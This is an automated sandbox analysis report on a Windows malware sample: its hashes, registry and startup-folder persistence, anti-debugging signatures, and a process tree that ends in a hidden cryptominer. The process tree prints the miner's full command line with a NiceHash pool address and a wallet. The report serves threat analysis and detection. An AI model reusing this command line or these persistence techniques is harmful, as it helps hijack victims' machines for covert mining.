Analysis
- max time kernel: 120s
- max time network: 145s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 31/05/2024, 15:06
Static task: static1
Behavioral task: behavioral1
- Sample: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
- Resource: win7-20240220-en
Behavioral task: behavioral2
- Sample: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
- Resource: win10v2004-20240508-en
General
- Target: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
- Size: 1.6MB
- MD5: 876cf2c8f925c3a8a29d254f34ca1d0d
- SHA1: b6e4acdc4fa514a9d879878249c223e946114e09
- SHA256: a65d885d904cc0f2d2452d4c2b8c58db5eb04153e45a3ce081d3f50d767e5e22
- SHA512: 25fce95c3722da3bc992762f2ba79db2e966870c0b11cc4701a7e1fc66f9c75da34f8521e70e01e518141edb6949c6a1a754520a03292f857629825fdefa78ee
- SSDEEP: 49152:Ae6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AeD9WuvtY7pHMD
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation (Process: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation (Process: WScript.exe)
- Drops startup file (1 IoCs)
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk (Process: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe)
- Executes dropped EXE (1 IoCs)
  - PID 3544: csrs.exe
- YARA rule matches (resource: rule)
  - behavioral2/files/0x0007000000023401-9.dat: vmprotect
  - behavioral2/memory/3544-11-0x0000000000090000-0x00000000003FB000-memory.dmp: vmprotect
  - behavioral2/memory/3544-12-0x0000000000090000-0x00000000003FB000-memory.dmp: vmprotect
  - behavioral2/memory/3544-31-0x0000000000090000-0x00000000003FB000-memory.dmp: vmprotect
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  - PID 3544: csrs.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoCs)
  - Key created: \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings (Process: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  - Token: SeLockMemoryPrivilege (PID 3544, Process: csrs.exe)
- Suspicious use of WriteProcessMemory (6 IoCs)
  - PID 4568 wrote to memory of 2928 (Process: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe, procid_target: 83)
  - PID 4568 wrote to memory of 2928 (Process: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe, procid_target: 83)
  - PID 4568 wrote to memory of 2928 (Process: 876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe, procid_target: 83)
  - PID 2928 wrote to memory of 3544 (Process: WScript.exe, procid_target: 92)
  - PID 2928 wrote to memory of 3544 (Process: WScript.exe, procid_target: 92)
  - PID 2928 wrote to memory of 3544 (Process: WScript.exe, procid_target: 92)
Processes
1. C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"
   PID: 4568
   - Checks computer location settings
   - Drops startup file
   - Modifies registry class
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
      PID: 2928
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      3. C:\ProgramData\Windows\csrs.exe
         Command line: "C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 19e8n98DfHt3un2eEQuYCZGron5z3dBZiZ -p x -t 10
         PID: 3544
         - Executes dropped EXE
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads